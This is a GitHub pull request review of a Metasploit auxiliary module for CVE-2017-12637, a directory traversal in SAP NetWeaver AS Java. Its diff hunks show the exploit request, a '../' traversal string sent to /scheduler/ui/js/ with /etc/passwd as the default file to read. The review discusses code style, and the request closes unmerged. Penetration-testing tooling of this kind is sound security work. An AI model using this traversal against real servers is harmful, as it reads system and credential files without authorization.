### PR TITLE
sap_redwood_traversal.rb CVE-2017-12637

### PR DESCRIPTION
**Pull request by vah13**
This is a module for exploitation an anon directory traversal vulnerability at SAP NetWeaver Application Server Java in Redwood module. The vulnerability active exploited from Chines hackers in the wild in 2017.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ]  use auxiliary/scanner/sap/sap_redwood_traversal
- [ ] set rhosts IP
- [ ] set FILEPATH %file_on_remote_server%
- [ ] run

### CODE REVIEW

File: modules/auxiliary/scanner/sap/sap_redwood_traversal.rb [hunk 1]
```diff
@@ -0,0 +1,74 @@
...
+          'Vahagn @vah_13 Vardanian'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Aug 28 2017"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new("FILEPATH", [false, 'Specify a parameter for the action'])
```
Comment (jvoisin) [inline modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: Can't you set a default value?

Comment (vah13) [reply modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: sure, I will all /etc/passwd

Comment (vah13) [reply modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: @jvoisin, please check
```
'
+ DefaultOptions' => {
+        'FILEPATH'          => '/etc/passwd'
+      }
```

**Comment by vah13** [comment]
@bcoles, what do you think, maybe need I change the module to exploit, instead of auxiliary

**Comment by h00die** [comment]
In a general sense, exploits give shells. So a directory traversal for file read should be an auction module

File: modules/auxiliary/scanner/sap/sap_redwood_traversal.rb [hunk 2]
```diff
@@ -0,0 +1,74 @@
...
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'SAP NetWeaver AS JAVA Directory Traversal',
+      'Description'    => %q{
+          This module exploits a directory traversal vulnerability found in SAP NetWeaver AS JAVA on default 50000 port.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-12637' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12637' ],
```
Comment (bcoles) [inline modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: Please add:

```ruby
['URL', 'http://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/']
```

File: modules/auxiliary/scanner/sap/sap_redwood_traversal.rb [hunk 3]
```diff
@@ -0,0 +1,74 @@
...
+        ],
+      'Author'         =>
+        [
+          'Vahagn @vah_13 Vardanian'
```
Comment (bcoles) [inline modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: Traditionally, the person or group who originally reported an issue is also included as an author.

```ruby
      'Author'         =>
        [
          '我不兽', # Discovery and PoC
          'Vahagn @vah_13 Vardanian' # Metasploit
        ],
```

I can only assume, based on the URL above, that the author's name is 我不兽 - but I'm not certain.

我不兽

File: modules/auxiliary/scanner/sap/sap_redwood_traversal.rb [hunk 4]
```diff
@@ -0,0 +1,74 @@
...
+    # No point to continue if no filename is specified
+    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
+      print_error("Please supply the name of the file you want to download")
+      return
+    end
+
+    print_status("Attempting to download: #{datastore['FILEPATH']}")
+
+    # Create request
+    traversal = "/../../../../../../../../../../../../../../../../"
```
Comment (bcoles) [inline modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: Traditionally, directory traversal modules make use of a `DEPTH` datastore option (default ~15), and use that here:

```ruby
    traversal = "../" * datastore['DEPTH']
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "/scheduler/ui/js/?/#{traversal}/#{datastore['FILEPATH']}"
    }, 25)
```

File: modules/auxiliary/scanner/sap/sap_redwood_traversal.rb [hunk 5]
```diff
@@ -0,0 +1,74 @@
...
+    res = send_request_raw({
```
Comment (bcoles) [inline modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: `send_request_cgi` is preferred over `send_request_raw`

File: modules/auxiliary/scanner/sap/sap_redwood_traversal.rb [hunk 6]
```diff
@@ -0,0 +1,74 @@
...
+      'method' => 'GET',
+      'uri'    => "/scheduler/ui/js/?#{traversal}/#{datastore['FILEPATH']}"
+    }, 25)
+
+    print_status("Server returns HTTP code: #{res.code.to_s}")
```
Comment (bcoles) [inline modules/auxiliary/scanner/sap/sap_redwood_traversal.rb]: `.to_s` is redundant here

**Comment by vah13** [comment]
@bcoles ping

**Comment by bcoles** [comment]
Please add module docs ([template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)).

You can find some examples for similar traversal modules [here](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules/auxiliary/scanner/http).

**Comment by vah13** [comment]
@bcoles I added 
https://github.com/rapid7/metasploit-framework/pull/10702

**Comment by bcoles** [comment]
Does anyone have a SAP NetWeaver Application Server install to test?

Alternatively, if the file is retrieved over clear-text HTTP, we can verify with a PCAP. In which case, please upload a pcap as an attachment to this issue, or via email to msfdev [at] metasploit com.

**Comment by acammack-r7** [comment]
@vah13 sorry we haven't been able to get this landed. Unfortunately we don't have SAP services to test against so we would need to against, so as @bcoles mentioned a PCAP is needed to help us verify it works. We don't want to lose this work, though, so I am adding the `attic` tag so we don't lose track of it. You can learn about our new PR label [on our wiki](https://github.com/rapid7/metasploit-framework/wiki/So-Your-PR-was-closed#moved-to-the-attic). Feel free to reopen if you get the chance to grab a PCAP.

**Pull request closed without merging**